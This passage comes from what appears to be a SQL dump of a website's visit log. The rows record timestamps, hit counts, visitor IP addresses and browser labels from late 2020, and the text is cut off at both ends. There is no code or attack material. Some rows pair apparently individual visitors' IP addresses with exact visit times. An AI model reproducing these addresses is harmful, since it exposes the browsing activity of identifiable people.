7351,1,1,0,0,'94.153.38.49','chrome'),(547849,1605457567,1,1,0,0,'80.243.146.233','chrome'),(547850,1605458012,1,1,0,0,'173.252.83.10','other'),(547851,1605458013,2,2,0,0,'173.252.83.111','other'),(547853,1605458335,1,1,0,0,'69.171.251.3','other'),(547854,1605459209,1,1,0,0,'173.252.127.26','other'),(547855,1605459229,1,1,0,0,'31.13.127.21','other'),(547856,1605459244,1,1,0,0,'91.196.178.18','chrome'),(547857,1605460076,1,1,0,0,'185.138.231.194','chrome'),(547858,1605461297,1,1,0,0,'37.73.90.154','chrome'),(547859,1605461960,1,1,0,0,'31.40.152.241','chrome'),(547860,1605461971,1,1,0,0,'194.44.83.253','chrome'),(547861,1605462276,1,1,0,0,'31.13.127.5','other'),(547862,1605462277,1,1,0,0,'31.13.127.9','other'),(547863,1605462293,1,1,0,0,'69.171.251.14','other'),(547864,1605462307,1,1,0,0,'31.13.127.22','other'),(547865,1605462437,1,1,0,0,'195.182.22.236','chrome'),(547866,1605463404,1,1,0,0,'91.196.178.180','chrome'),(547867,1605464022,1,1,0,0,'31.13.127.17','other'),(547868,1605467696,1,1,0,0,'94.153.15.170','chrome'),(547869,1605468959,1,1,0,0,'77.92.52.134','chrome'),(547870,1605469336,1,1,0,0,'31.13.127.112','other'),(547871,1605475139,1,1,0,0,'69.171.251.9','other'),(547872,1605475790,1,1,0,0,'66.220.149.113','other'),(547873,1605476020,1,1,0,0,'195.26.18.134','other'),(547874,1605477002,1,1,0,0,'173.252.111.9','other'),(547875,1605486564,1,0,1,0,'66.249.66.92',''),(547876,1605505483,1,1,0,0,'173.252.95.7','chrome'),(547877,1605505501,2,2,0,0,'173.252.95.23','chrome'),(547878,1605516431,1,1,0,0,'46.211.51.8','chrome'),(547879,1605519043,1,1,0,0,'178.93.186.250','firefox'),(547880,1605525431,1,1,0,0,'31.13.127.2','other'),(547881,1605541140,1,1,0,0,'176.117.80.33','chrome'),(547882,1605542193,1,1,0,0,'173.252.87.8','other'),(547883,1605542194,1,1,0,0,'173.252.87.5','other'),(547884,1605547357,1,1,0,0,'193.32.70.84','chrome'),(547885,1605549543,1,1,0,0,'66.220.149.1','other'),(547886,1605549544,1,1,0,0,'66.220.149.31','other'),(547887,1605549848,1,1,0,0,'69.171.251.6','other'),(547888,1605549853,1,1,0,0,'173.252.95.118','other'),(547889,1605549905,1,1,0,0,'69.171.251.15','other'),(547890,1605549931,1,1,0,0,'31.13.127.5','other'),(547891,1605549932,1,1,0,0,'31.13.127.4','other'),(547892,1605554998,1,1,0,0,'173.252.87.2','other'),(547893,1605555932,1,1,0,0,'37.221.138.52','chrome'),(547894,1605597506,1,1,0,0,'66.220.149.21','other'),(547895,1605598000,1,0,1,0,'66.249.66.203',''),(547896,1605599129,1,1,0,0,'173.252.127.16','other'),(547897,1605600292,1,1,0,0,'31.13.127.20','other'),(547898,1605609022,1,1,0,0,'91.196.178.69','chrome'),(547899,1605609766,1,1,0,0,'66.220.149.111','other'),(547900,1605614278,1,1,0,0,'69.171.251.12','other'),(547901,1605614301,1,1,0,0,'31.13.127.1','other'),(547902,1605614349,1,1,0,0,'31.13.127.116','other'),(547903,1605614352,1,1,0,0,'173.252.95.6','other'),(547904,1605614365,2,2,0,0,'31.13.127.18','other'),(547905,1605614366,2,2,0,0,'31.13.127.120','other'),(547906,1605614369,1,1,0,0,'31.13.127.119','other'),(547907,1605614429,1,1,0,0,'31.13.127.118','other'),(547908,1605617511,1,1,0,0,'31.13.127.12','other'),(547909,1605617512,1,1,0,0,'31.13.127.116','other'),(547910,1605617519,1,1,0,0,'69.171.251.6','other'),(547911,1605617523,1,1,0,0,'31.13.127.15','other'),(547912,1605617535,1,1,0,0,'185.237.217.6','chrome'),(547913,1605618213,1,1,0,0,'69.171.251.28','other'),(547914,1605618214,1,1,0,0,'31.13.127.4','other'),(547915,1605618611,1,1,0,0,'173.252.127.1','other'),(547916,1605618612,1,1,0,0,'173.252.95.118','other'),(547917,1605625786,1,1,0,0,'31.13.127.8','other'),(547918,1605627499,1,1,0,0,'173.252.83.10','other'),(547919,1605632413,1,1,0,0,'173.252.95.4','other'),(547921,1605636822,1,1,0,0,'69.171.251.24','other'),(547922,1605639559,1,1,0,0,'173.252.95.23','other'),(547923,1605639616,1,1,0,0,'195.182.22.236','chrome'),(547924,1605640791,1,1,0,0,'31.13.127.19','other'),(547925,1605644491,1,1,0,0,'69.171.251.11','other'),(547926,1605646223,1,1,0,0,'69.171.251.24','other'),(547927,1605646224,1,1,0,0,'31.13.127.3','other'),(547928,1605656316,1,1,0,0,'173.252.127.120','other'),(547929,1605656317,1,1,0,0,'173.252.95.8','other'),(547930,1605664827,1,1,0,0,'66.249.66.153','chrome'),(547931,1605667665,1,1,0,0,'66.249.66.153','chrome'),(547932,1605668840,1,1,0,0,'66.220.149.27','other'),(547933,1605695329,1,0,1,0,'66.249.66.205',''),(547934,1605696674,1,1,0,0,'31.13.127.2','other'),(547935,1605701258,1,1,0,0,'95.164.57.223','chrome'),(547936,1605707117,1,1,0,0,'91.196.178.14','chrome'),(547937,1605709889,1,1,0,0,'69.171.251.117','other'),(547938,1605715803,1,1,0,0,'173.252.95.4','other'),(547939,1605719588,1,1,0,0,'69.171.251.38','other'),(547940,1605731431,1,1,0,0,'46.211.54.220','chrome'),(547941,1605731660,1,1,0,0,'31.13.127.7','other'),(547942,1605731678,1,1,0,0,'66.220.149.116','other'),(547943,1605737958,1,1,0,0,'69.171.251.8','other'),(547945,1605738736,1,1,0,0,'31.13.103.15','other'),(547946,1605738818,1,1,0,0,'31.13.115.13','other'),(547947,1605742192,1,1,0,0,'69.171.251.12','other'),(547948,1605742197,1,1,0,0,'31.13.127.6','other'),(547949,1605769589,1,1,0,0,'91.196.178.69','chrome'),(547950,1605770916,1,1,0,0,'91.196.178.69','chrome'),(547951,1605780682,1,1,0,0,'173.252.127.117','other'),(547952,1605798858,1,1,0,0,'31.13.127.113','other'),(547953,1605805524,1,0,1,0,'66.249.66.207',''),(547954,1605813023,1,1,0,0,'173.252.95.22','other'),(547955,1605813024,1,1,0,0,'173.252.127.9','other'),(547956,1605813280,1,1,0,0,'66.220.149.35','other'),(547957,1605816475,1,1,0,0,'31.13.127.23','other'),(547958,1605819268,1,1,0,0,'31.13.127.120','other'),(547959,1605821211,1,1,0,0,'69.171.251.120','other'),(547960,1605821357,1,1,0,0,'31.13.127.6','other'),(547961,1605832576,1,1,0,0,'66.249.66.91','chrome'),(547962,1605856509,1,1,0,0,'31.13.127.22','other'),(547963,1605856510,1,1,0,0,'31.13.127.113','other'),(547964,1605856511,1,1,0,0,'69.171.251.113','other'),(547965,1605871494,1,1,0,0,'173.252.107.1','other'),(547966,1605872334,1,1,0,0,'69.171.251.32','other'),(547967,1605875276,1,1,0,0,'69.171.251.14','other'),(547968,1605881738,1,1,0,0,'94.153.25.86','chrome'),(547969,1605884181,1,1,0,0,'91.196.178.5','chrome'),(547970,1605902283,1,1,0,0,'66.249.70.47','chrome'),(547971,1605902525,1,0,1,0,'66.249.70.43',''),(547972,1605904489,1,1,0,0,'91.196.178.65','chrome'),(547973,1605920836,1,1,0,0,'31.13.115.120','other'),(547974,1605920837,1,1,0,0,'31.13.115.23','other'),(547975,1605922047,1,1,0,0,'31.13.115.3','other'),(547976,1605922071,1,1,0,0,'31.13.103.19','other'),(547977,1605928846,1,1,0,0,'69.171.251.17','other'),(547979,1605949093,1,1,0,0,'31.13.127.1','other'),(547980,1605953357,1,1,0,0,'91.196.178.5','chrome'),(547981,1605955396,1,1,0,0,'31.13.127.117','other'),(547982,1605956256,1,1,0,0,'69.171.251.26','other'),(547983,1605957321,1,1,0,0,'66.220.149.32','other'),(547984,1605968596,1,1,0,0,'66.220.149.18','other'),(547985,1605969216,1,1,0,0,'31.13.127.21','other'),(547986,1605970174,1,1,0,0,'31.13.103.116','other'),(547988,1605970175,1,1,0,0,'31.13.103.119','other'),(547989,1605972726,1,1,0,0,'66.249.70.47','chrome'),(547990,1605973828,1,1,0,0,'66.249.70.43','chrome'),(547991,1605979233,1,1,0,0,'31.13.127.18','other'),(547992,1605980044,1,1,0,0,'69.171.251.30','other'),(547993,1605980959,1,1,0,0,'173.252.127.25','other'),(547994,1605980960,1,1,0,0,'31.13.127.22','other'),(547995,1605981115,1,1,0,0,'31.13.127.1','other'),(547996,1605981117,1,1,0,0,'173.252.95.9','other'),(547997,1605981284,1,1,0,0,'31.13.127.116','other'),(547998,1605981356,1,1,0,0,'31.13.127.17','other'),(547999,1605982805,1,1,0,0,'31.13.127.15','other'),(548000,1605986792,3,3,0,0,'176.37.90.125','other'),(548001,1605989029,1,0,1,0,'66.249.70.45',''),(548002,1605989995,1,1,0,0,'173.252.127.18','other'),(548003,1605992616,1,1,0,0,'173.252.127.29','other'),(548004,1605994678,1,1,0,0,'69.171.251.31','other'),(548005,1606020232,1,1,0,0,'66.220.149.26','other'),(548006,1606023440,1,1,0,0,'31.13.115.112','other'),(548007,1606035823,1,1,0,0,'31.13.103.10','other'),(548008,1606040205,1,1,0,0,'173.252.111.11','other'),(548009,1606040207,1,1,0,0,'31.13.127.22','other'),(548011,1606052921,1,1,0,0,'173.252.127.11','other'),(548012,1606057713,1,1,0,0,'66.249.70.45','chrome'),(548013,1606058498,1,1,0,0,'69.171.251.17','other'),(548014,1606059250,1,1,0,0,'31.13.127.14','other'),(548015,1606063368,1,1,0,0,'5.16.106.205','other'),(548016,1606064428,1,1,0,0,'69.171.251.35','other'),(548017,1606064429,1,1,0,0,'66.220.149.116','other'),(548018,1606073305,1,1,0,0,'163.172.148.199','other'),(548019,1606075064,1,0,1,0,'66.249.70.45',''),(548020,1606078803,1,1,0,0,'91.235.227.118','chrome'),(548021,1606080058,1,1,0,0,'31.13.127.113','other'),(548022,1606083025,1,1,0,0,'31.13.127.7','other'),(548023,1606084143,1,1,0,0,'178.95.247.188','chrome'),(548024,1606087016,1,1,0,0,'69.171.249.1','other'),(548025,1606093294,1,1,0,0,'66.249.70.43','chrome'),(548026,1606096245,1,1,0,0,'173.252.95.26','other'),(548027,1606102249,1,1,0,0,'31.13.115.118','other'),(548028,1606102308,1,1,0,0,'31.13.115.116','other'),(548029,1606114963,1,1,0,0,'31.13.127.11','other'),(548030,1606118930,1,1,0,0,'173.252.87.11','other'),(548031,1606126450,1,1,0,0,'173.252.95.15','other'),(548032,1606127185,1,1,0,0,'173.252.95.14','other'),(548033,1606128596,1,1,0,0,'173.252.95.112','other'),(548034,1606133232,1,1,0,0,'66.249.70.45','chrome'),(548035,1606136479,1,1,0,0,'69.171.251.118','other'),(548037,1606136511,1,0,1,0,'66.249.70.47',''),(548038,1606136633,1,1,0,0,'66.220.149.27','other'),(548039,1606152725,1,1,0,0,'31.13.127.116','other'),(548040,1606156168,1,1,0,0,'74.125.151.47','other'),(548041,1606158494,1,1,0,0,'69.171.251.25','other'),(548043,1606158509,1,1,0,0,'37.55.238.193','chrome'),(548044,1606158632,1,1,0,0,'31.13.127.17','other'),(548045,1606159310,1,1,0,0,'66.249.70.45','chrome'),(548046,1606160457,1,1,0,0,'31.13.127.113','other'),(548047,1606160736,1,1,0,0,'31.13.127.120','other'),(548048,1606161442,1,0,1,0,'66.249.70.47',''),(548049,1606161913,1,1,0,0,'51.158.118.231','other'),(548050,1606162088,1,1,0,0,'173.252.127.9','other'),(548051,1606162095,1,1,0,0,'173.252.127.32','other'),(548052,1606162962,2,2,0,0,'176.37.90.125','other'),(548053,1606163613,1,1,0,0,'66.249.70.45','chrome'),(548054,1606163937,1,1,0,0,'69.171.251.23','other'),(548055,1606163941,1,1,0,0,'173.252.127.16','other'),(548057,1606167779,1,1,0,0,'66.249.70.43','chrome'),(548058,1606169816,1,1,0,0,'46.211.37.133','chrome'),(548059,1606170705,1,1,0,0,'69.171.251.112','other'),(548060,1606170706,1,1,0,0,'31.13.127.23','other'),(548061,1606174725,1,1,0,0,'66.249.70.45','chrome'),(548062,1606174946,1,1,0,0,'173.252.95.26','other'),(548064,1606194529,1,1,0,0,'31.13.127.13','other'),(548065,1606198512,1,0,1,0,'66.249.70.47',''),(548066,1606201231,1,1,0,0,'69.171.251.32','other'),(548067,1606202444,1,1,0,0,'93.170.117.25','other'),(548068,1606205079,1,1,0,0,'178.128.230.27','chrome'),(548069,1606205080,1,1,0,0,'165.22.237.105','chrome'),(548070,1606205082,1,1,0,0,'159.203.34.100','chrome'),(548071,1606205083,1,1,0,0,'165.22.225.245','chrome'),(548072,1606209811,1,1,0,0,'31.13.127.2','other'),(548073,1606219067,1,1,0,0,'69.171.251.8','other'),(548074,1606224281,1,0,1,0,'66.249.70.45',''),(548075,1606226478,1,1,0,0,'69.171.251.18','other'),(548076,1606227096,1,1,0,0,'173.252.95.112','other'),(548077,1606227097,1,1,0,0,'173.252.127.27','other'),(548078,1606227309,1,1,0,0,'69.171.251.6','other'),(548079,1606227340,1,1,0,0,'173.252.95.17','other'),(548080,1606228078,1,1,0,0,'31.13.127.15','other'),(548081,1606229906,1,1,0,0,'69.171.251.120','other'),(548082,1606229910,1,1,0,0,'173.252.95.12','other'),(548083,1606237553,1,1,0,0,'66.249.70.47','chrome'),(548084,1606241826,1,1,0,0,'173.252.127.35','other'),(548085,1606241827,1,1,0,0,'173.252.95.6','other'),(548086,1606243629,1,1,0,0,'31.13.127.14','other'),(548087,1606246391,1,1,0,0,'69.171.251.5','other'),(548088,1606246410,1,1,0,0,'31.13.127.2','other'),(548089,1606246493,1,1,0,0,'69.171.251.17','other'),(548090,1606246675,1,1,0,0,'173.252.95.120','other'),(548091,1606246988,1,1,0,0,'66.220.149.43','other'),(548093,1606247565,1,1,0,0,'31.13.127.119','other'),(548094,1606247593,1,1,0,0,'69.171.251.37','other'),(548095,1606247778,1,0,1,0,'66.249.70.47',''),(548096,1606247886,1,1,0,0,'173.252.127.37','other'),(548097,1606247893,1,1,0,0,'31.13.127.15','other'),(548098,1606247938,1,1,0,0,'173.252.127.23','other'),(548099,1606248271,1,1,0,0,'69.171.251.7','other'),(548100,1606248305,1,1,0,0,'31.13.127.5','other'),(548101,1606250122,1,1,0,0,'31.13.127.2','other'),(548102,1606250293,1,1,0,0,'69.171.251.120','other'),(548104,1606250450,1,1,0,0,'31.13.127.8','other'),(548105,1606251128,1,1,0,0,'69.171.251.26','other'),(548106,1606251433,1,1,0,0,'69.171.251.36','other'),(548107,1606252450,1,1,0,0,'173.252.127.120','other'),(548108,1606252489,1,1,0,0,'173.252.127.23','other'),(548109,1606252717,1,1,0,0,'69.171.251.36','other'),(548110,1606252719,1,1,0,0,'31.13.127.118','other'),(548111,1606252816,1,1,0,0,'173.252.95.28','other'),(548112,1606252975,1,1,0,0,'173.252.95.17','other'),(548113,1606252976,1,1,0,0,'173.252.127.4','other'),(548114,1606253206,1,1,0,0,'91.124.212.170','chrome'),(548115,1606254126,1,1,0,0,'31.13.127.18','other'),(548116,1606254128,1,1,0,0,'173.252.127.11','other'),(548117,1606254129,1,1,0,0,'66.220.149.120','other'),(548118,1606265285,1,1,0,0,'31.13.103.5','other'),(548120,1606271960,1,0,1,0,'66.249.70.43',''),(548121,1606280509,1,1,0,0,'173.252.95.4','other'),(548122,1606284401,1,1,0,0,'69.171.251.23','other'),(548123,1606285235,1,1,0,0,'69.171.251.112','other'),(548124,1606285839,1,1,0,0,'69.171.251.34','other'),(548125,1606286411,1,1,0,0,'69.171.251.2','other'),(548126,1606287320,1,1,0,0,'66.220.149.7','other'),(548127,1606287552,1,1,0,0,'69.171.251.10','other'),(548128,1606287714,1,1,0,0,'173.252.127.39','other'),(548129,1606288397,1,1,0,0,'69.171.251.117','other'),(548130,1606289109,1,1,0,0,'173.252.127.16','other'),(548131,1606289335,1,1,0,0,'69.171.251.21','other'),(548132,1606290853,1,1,0,0,'69.171.251.28','other'),(548133,1606291207,1,1,0,0,'69.171.251.32','other'),(548134,1606292257,1,1,0,0,'69.171.251.7','other'),(548135,1606294879,1,1,0,0,'69.171.251.5','other'),(548136,1606294880,1,1,0,0,'31.13.127.4','other'),(548137,1606298988,1,1,0,0,'95.46.160.251','chrome'),(548138,1606300660,1,1,0,0,'69.171.251.20','other'),(548139,1606301238,1,1,0,0,'31.13.127.10','other'),(548140,1606301357,1,1,0,0,'31.13.127.6','other'),(548141,1606301358,1,1,0,0,'31.13.127.15','other'),(548142,1606301817,1,1,0,0,'173.252.127.1','other'),(548143,1606301895,1,1,0,0,'69.171.251.13','other'),(548144,1606304970,1,1,0,0,'66.220.149.1','other'),(548145,1606305905,1,1,0,0,'173.252.127.116','other'),(548146,1606307260,1,1,0,0,'69.171.251.120','other'),(548147,1606310167,1,1,0,0,'66.220.149.4','other'),(548148,1606310318,1,0,1,0,'66.249.70.47',''),(548149,1606316430,1,1,0,0,'31.13.127.6','other'),(548150,1606320610,1,1,0,0,'69.171.251.31','other'),(548151,1606320611,1,1,0,0,'31.13.127.6','other'),(548152,1606321299,1,1,0,0,'69.171.251.12','other'),(548153,1606321300,1,1,0,0,'173.252.95.10','other'),(548154,1606321310,1,1,0,0,'66.220.149.35','other'),(548155,1606322552,1,1,0,0,'66.220.149.38','other'),(548156,1606324184,1,1,0,0,'178.95.247.130','chrome'),(548157,1606324263,1,1,0,0,'69.171.251.10','other'),(548158,1606324264,1,1,0,0,'31.13.127.4','other'),(548159,1606324821,1,1,0,0,'69.171.251.28','other'),(548160,1606325953,1,1,0,0,'173.252.127.118','other'),(548162,1606326394,1,1,0,0,'66.249.70.47','chrome'),(548163,1606327404,1,1,0,0,'69.171.251.112','other'),(548164,1606327449,1,0,1,0,'66.249.70.45',''),(548165,1606328752,1,1,0,0,'69.171.251.19','other'),(548166,1606329865,1,1,0,0,'31.13.127.6','other'),(548167,1606329866,1,1,0,0,'173.252.127.12','other'),(548168,1606333242,1,1,0,0,'173.252.127.22','other'),(548170,1606334135,1,0,1,0,'66.249.70.45',''),(548171,1606339863,1,1,0,0,'31.13.127.14','other'),(548173,1606366815,1,1,0,0,'31.13.115.12','other'),(548174,1606366846,1,1,0,0,'31.13.127.17','other'),(548175,1606366847,1,1,0,0,'69.171.251.38','other'),(548176,1606374765,1,1,0,0,'66.249.70.45','chrome'),(548177,1606374859,1,0,1,0,'66.249.70.43',''),(548178,1606378322,1,1,0,0,'173.252.127.21','other'),(548179,1606387668,1,1,0,0,'173.252.127.20','other'),(548180,1606387669,1,1,0,0,'173.252.95.10','other'),(548181,1606390217,1,1,0,0,'69.171.251.15','other'),(548182,1606390779,1,1,0,0,'69.171.251.9','other'),(548183,1606395769,1,1,0,0,'173.252.95.119','other'),(548184,1606395793,1,1,0,0,'173.252.95.19','other'),(548185,1606396918,1,0,1,0,'66.249.70.43',''),(548186,1606406233,1,1,0,0,'69.171.251.27','other'),(548187,1606406262,1,1,0,0,'66.220.149.117','other'),(548188,1606406263,1,1,0,0,'69.171.251.2','other'),(548189,1606428251,1,1,0,0,'69.171.251.29','other'),(548190,1606434126,1,1,0,0,'31.13.103.1','other'),(548191,1606442774,1,1,0,0,'52.34.251.201','firefox'),(548192,1606451911,1,1,0,0,'69.171.251.117','other'),(548193,1606451914,1,1,0,0,'66.220.149.25','other'),(548194,1606458041,1,1,0,0,'31.13.127.17','other'),(548195,1606464531,1,1,0,0,'209.17.96.106','other'),(548196,1606473951,1,1,0,0,'91.196.178.79','chrome'),(548197,1606477316,1,1,0,0,'69.171.251.8','other'),(548198,1606477317,1,1,0,0,'66.220.149.26','other'),(548199,1606483560,1,0,1,0,'66.249.70.45',''),(548200,1606490082,2,2,0,0,'188.163.121.246','chrome'),(548201,1606491989,1,1,0,0,'91.196.178.20','chrome'),(548202,1606492038,1,1,0,0,'31.13.127.9','other'),(548204,1606492039,1,1,0,0,'31.13.127.24','other'),(548205,1606492045,2,2,0,0,'31.13.127.117','other'),(548206,1606492048,1,1,0,0,'31.13.127.7','other'),(548207,1606492242,1,1,0,0,'94.153.16.144','chrome'),(548208,1606492399,1,1,0,0,'31.13.115.20','other'),(548209,1606494702,1,1,0,0,'31.13.115.19','other'),(548210,1606494864,1,1,0,0,'91.189.157.157','chrome'),(548211,1606495673,1,1,0,0,'93.77.143.68','other'),(548212,1606496406,1,1,0,0,'178.133.225.183','chrome'),(548213,1606497145,1,1,0,0,'31.13.127.20','other'),(548214,1606497146,2,2,0,0,'31.13.127.13','other'),(548216,1606497178,1,1,0,0,'46.211.84.34','chrome'),(548217,1606497692,1,1,0,0,'176.121.4.91','chrome'),(548218,1606500457,1,1,0,0,'176.121.6.47','chrome'),(548219,1606501129,1,1,0,0,'173.252.95.5','other'),(548221,1606501130,1,1,0,0,'69.171.251.10','other'),(548222,1606501131,1,1,0,0,'69.171.251.33','other'),(548223,1606501328,1,1,0,0,'66.220.149.22','other'),(548224,1606501345,1,1,0,0,'188.191.73.44','chrome'),(548225,1606501434,1,1,0,0,'46.211.9.67','chrome'),(548226,1606501536,1,1,0,0,'92.112.251.95','other'),(548227,1606502000,1,1,0,0,'173.252.87.9','other'),(548228,1606505293,1,1,0,0,'31.13.103.3','other'),(548229,1606505963,1,1,0,0,'173.252.87.13','other'),(548230,1606506261,2,2,0,0,'46.133.92.88','chrome'),(548231,1606506919,1,1,0,0,'94.179.194.44','chrome'),(548232,1606507803,3,3,0,0,'176.37.90.125','other'),(548233,1606508364,1,1,0,0,'91.241.99.136','chrome'),(548234,1606510110,1,1,0,0,'173.252.107.23','other'),(548235,1606510455,1,1,0,0,'188.191.66.131','other'),(548236,1606514260,1,1,0,0,'91.195.69.142','chrome'),(548237,1606540545,1,1,0,0,'146.120.168.142','chrome'),(548238,1606541336,1,1,0,0,'173.252.127.18','other'),(548239,1606541337,1,1,0,0,'173.252.127.16','other'),(548240,1606541585,1,1,0,0,'173.252.127.39','other'),(548241,1606544484,1,1,0,0,'94.153.31.98','chrome'),(548242,1606545517,1,1,0,0,'46.211.8.196','chrome'),(548243,1606546927,1,1,0,0,'31.129.235.204','chrome'),(548244,1606548369,1,1,0,0,'69.171.251.30','other'),(548245,1606550110,1,1,0,0,'173.252.87.4','other'),(548246,1606553144,1,1,0,0,'173.252.87.23','other'),(548247,1606554292,1,1,0,0,'31.43.229.129','chrome'),(548248,1606568697,1,1,0,0,'185.93.62.6','chrome'),(548249,1606569922,1,0,1,0,'66.249.70.43',''),(548250,1606571744,1,1,0,0,'193.56.13.68','chrome'),(548251,1606576068,1,1,0,0,'31.13.127.7','other'),(548252,1606577527,1,1,0,0,'69.171.251.37','other'),(548253,1606586979,1,1,0,0,'46.211.41.47','chrome'),(548254,1606588698,1,1,0,0,'31.13.127.4','other'),(548255,1606591709,1,0,1,0,'66.249.70.45',''),(548256,1606591812,1,1,0,0,'173.252.95.10','other'),(548257,1606594368,1,1,0,0,'91.124.17.79','chrome'),(548258,1606596353,1,1,0,0,'69.171.251.19','other'),(548260,1606596354,1,1,0,0,'69.171.249.17','other'),(548261,1606647403,1,1,0,0,'34.254.44.235','other'),(548262,1606649375,1,1,0,0,'194.44.32.130','chrome'),(548263,1606656457,1,0,1,0,'66.249.70.43',''),(548264,1606658099,1,1,0,0,'69.171.251.22','other'),(548265,1606662495,2,2,0,0,'128.124.49.146','chrome'),(548266,1606662559,2,2,0,0,'167.114.116.24','chrome'),(548267,1606666525,1,1,0,0,'213.5.193.177','chrome'),(548268,1606677837,1,1,0,0,'188.191.237.159','chrome'),(548269,1606678597,1,1,0,0,'173.252.95.21','other'),(548270,1606678598,1,1,0,0,'173.252.127.28','other'),(548271,1606678678,1,1,0,0,'31.13.115.20','other'),(548272,1606678679,1,1,0,0,'31.13.115.111','other'),(548273,1606679016,1,1,0,0,'173.252.127.15','other'),(548274,1606679018,1,1,0,0,'31.13.127.15','other'),(548275,1606679060,1,1,0,0,'31.13.127.3','other'),(548276,1606679062,1,1,0,0,'173.252.95.116','other'),(548277,1606683867,1,0,1,0,'66.249.70.43',''),(548278,1606684722,1,1,0,0,'109.70.106.130','other'),(548279,1606686756,1,1,0,0,'173.252.95.11','other'),(548280,1606686757,1,1,0,0,'69.171.251.7','other'),(548281,1606698493,4,4,0,0,'109.70.104.23','chrome'),(548282,1606700615,1,1,0,0,'128.124.112.97','chrome'),(548283,1606700878,2,2,0,0,'173.252.79.6','other'),(548284,1606713559,1,1,0,0,'31.13.127.15','other'),(548285,1606714156,1,1,0,0,'173.252.127.23','other'),(548286,1606714336,1,1,0,0,'173.252.127.28','other'),(548287,1606731056,1,1,0,0,'31.13.127.22','other'),(548288,1606738817,1,1,0,0,'185.93.62.6','chrome'),(548289,1606742945,1,1,0,0,'69.171.251.28','other'),(548290,1606742970,1,1,0,0,'173.252.95.20','other'),(548291,1606743196,1,1,0,0,'31.13.127.118','other'),(548295,1606743197,1,1,0,0,'31.13.127.16','other'),(548296,1606743198,1,1,0,0,'91.196.178.151','chrome'),(548297,1606743455,1,0,1,0,'66.249.70.45',''),(548298,1606749596,1,1,0,0,'93.170.117.25','other'),(548299,1606761782,2,2,0,0,'31.13.127.10','other'),(548300,1606761783,1,1,0,0,'31.13.127.2','other'),(548302,1606764966,1,1,0,0,'173.252.127.34','other'),(548303,1606767895,1,1,0,0,'69.171.251.27','other'),(548304,1606767922,1,1,0,0,'31.13.127.119','other'),(548305,1606770642,1,0,1,0,'66.249.70.43',''),(548306,1606775699,1,1,0,0,'173.252.95.17','other'),(548307,1606775702,1,1,0,0,'173.252.95.13','other'),(548308,1606775897,1,1,0,0,'31.13.127.112','other'),(548309,1606776021,1,1,0,0,'31.13.127.3','other'),(548311,1606776145,1,1,0,0,'31.13.127.117','other'),(548312,1606776146,1,1,0,0,'31.13.127.9','other'),(548313,1606810984,1,1,0,0,'173.252.95.113','other'),(548314,1606810985,1,1,0,0,'173.252.127.3','other'),(548315,1606811132,1,1,0,0,'69.171.251.9','other'),(548316,1606817412,1,1,0,0,'173.252.95.24','other'),(548317,1606821428,1,1,0,0,'31.13.127.8','other'),(548318,1606835469,1,0,1,0,'66.249.70.43',''),(548319,1606848928,1,1,0,0,'66.220.149.34','other'),(548320,1606851410,1,1,0,0,'173.252.111.14','other'),(548321,1606859912,1,0,1,0,'66.249.70.43',''),(548322,1606866866,1,0,1,0,'66.249.70.45',''),(548323,1606902464,1,1,0,0,'69.171.251.25','other'),(548324,1606909795,1,1,0,0,'185.93.62.6','chrome'),(548325,1606909881,1,1,0,0,'74.125.151.43','other'),(548326,1606910478,1,1,0,0,'69.171.251.25','other'),(548327,1606910523,1,1,0,0,'94.153.52.155','chrome'),(548328,1606919831,1,1,0,0,'178.133.188.115','chrome'),(548329,1606922765,1,0,1,0,'66.249.70.47',''),(548330,1606922966,1,1,0,0,'93.170.117.25','other'),(548331,1606924769,1,1,0,0,'69.171.251.12','other'),(548332,1606931761,1,1,0,0,'194.9.15.162','chrome'),(548333,1606932024,3,3,0,0,'31.13.127.15','other'),(548335,1606938781,1,1,0,0,'94.153.14.21','chrome'),(548336,1606948624,1,1,0,0,'31.13.127.8','other'),(548337,1606948647,1,1,0,0,'31.13.127.21','other'),(548338,1606948701,1,1,0,0,'31.13.127.14','other'),(548339,1606951566,1,0,1,0,'66.249.70.43',''),(548340,1606980141,1,1,0,0,'69.171.251.13','other'),(548341,1606987214,1,1,0,0,'69.171.251.8','other'),(548342,1606987831,1,1,0,0,'173.252.95.12','other'),(548343,1606992444,1,0,1,0,'66.249.70.43',''),(548344,1606994342,1,0,1,0,'66.249.70.43',''),(548345,1606994510,1,1,0,0,'31.13.127.118','other'),(548346,1607009160,1,0,1,0,'66.249.70.43',''),(548347,1607011503,1,1,0,0,'31.13.127.11','other'),(548348,1607011542,1,1,0,0,'66.220.149.34','other'),(548349,1607013488,3,3,0,0,'176.37.90.125','other'),(548350,1607017615,1,1,0,0,'31.13.127.9','other'),(548351,1607027208,1,1,0,0,'66.249.70.43','chrome'),(548352,1607038363,1,0,1,0,'66.249.70.47',''),(548353,1607063801,1,1,0,0,'93.170.117.25','other'),(548354,1607078001,1,1,0,0,'31.13.127.2','other'),(548355,1607095513,1,0,1,0,'66.249.70.45',''),(548356,1607104613,1,1,0,0,'69.171.251.35','other'),(548357,1607104634,1,1,0,0,'173.252.95.3','other'),(548358,1607109919,1,1,0,0,'91.196.178.65','chrome'),(548359,1607116733,1,1,0,0,'69.171.251.24','other'),(548360,1607116790,1,1,0,0,'31.13.127.113','other'),(548361,1607117100,1,1,0,0,'31.13.127.24','other'),(548362,1607117101,1,1,0,0,'31.13.127.11','other'),(548363,1607138218,1,1,0,0,'138.246.253.24','chrome'),(548364,1607138828,1,0,1,0,'66.249.70.47',''),(548365,1607141095,1,1,0,0,'69.171.251.29','other'),(548366,1607145855,1,1,0,0,'66.220.149.26','other'),(548367,1607145865,1,1,0,0,'173.252.95.116','other'),(548368,1607145889,1,1,0,0,'31.13.103.1','other'),(548369,1607146022,1,1,0,0,'31.13.103.119','other'),(548370,1607146050,1,1,0,0,'69.171.251.33','other'),(548371,1607146925,1,1,0,0,'66.249.70.43','chrome'),(548372,1607151005,1,1,0,0,'64.246.165.210','firefox'),(548373,1607172104,1,1,0,0,'69.171.251.15','other'),(548374,1607174402,1,1,0,0,'31.13.127.111','other'),(548375,1607181433,1,0,1,0,'66.249.70.47',''),(548376,1607190074,1,1,0,0,'31.13.127.22','other'),(548377,1607191320,1,1,0,0,'93.170.117.25','other'),(548378,1607202128,1,1,0,0,'69.171.251.26','other'),(548379,1607202378,1,1,0,0,'31.13.127.20','other'),(548380,1607225244,1,0,1,0,'66.249.70.57',''),(548381,1607227334,2,2,0,0,'66.249.70.45','chrome'),(548382,1607235142,1,1,0,0,'69.171.251.111','other'),(548383,1607241591,1,1,0,0,'91.196.178.22','chrome'),(548384,1607242496,2,1,1,0,'66.249.70.45',''),(548385,1607243360,1,1,0,0,'66.